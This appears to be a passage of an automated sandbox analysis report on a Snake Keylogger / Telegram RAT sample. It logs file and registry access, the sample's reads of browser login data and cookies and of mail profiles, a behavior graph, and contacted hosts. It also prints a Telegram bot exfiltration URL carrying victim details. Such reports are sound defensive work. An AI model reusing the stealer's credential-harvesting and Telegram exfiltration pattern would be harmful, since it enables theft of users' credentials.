Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Nonalined.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637274 Sample: NDQ211216GM08.exe.bin.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 4 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 54 5 other signatures 2->54 8 NDQ211216GM08.exe.bin.exe 36 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 30->50 52 Uses the Telegram API (likely for C&C communication) 32->52 process4 dnsIp5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 14 powershell.exe 30 8->14         started        42 127.0.0.1 unknown unknown 11->42 file6 process7 file8 26 C:\Users\user\AppData\Local\...26onalined.exe, PE32 14->26 dropped 28 C:\Users\...28onalined.exe:Zone.Identifier, ASCII 14->28 dropped 64 Early bird code injection technique detected 14->64 66 Writes to foreign memory regions 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 70 3 other signatures 14->70 18 Nonalined.exe 15 8 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49713 TELEGRAMRU United Kingdom 18->36 38 checkip.dyndns.com 193.122.130.0, 49695, 49699, 49701 ORACLE-BMC-31898US United States 18->38 40 3 other IPs or domains 18->40 56 Antivirus detection for dropped file 18->56 58 Multi AV Scanner detection for dropped file 18->58 60 Tries to steal Mail credentials (via file / registry access) 18->60 62 3 other signatures 18->62 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.129
 drive.usercontent.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
142.250.74.206
 drive.google.com United States
15169 GOOGLEUS false
193.122.130.0
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
104.21.80.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
drive.google.com 142.250.74.206 true
drive.usercontent.google.com 142.250.186.129 true
reallyfreegeoip.org 104.21.80.1 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.130.0 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		high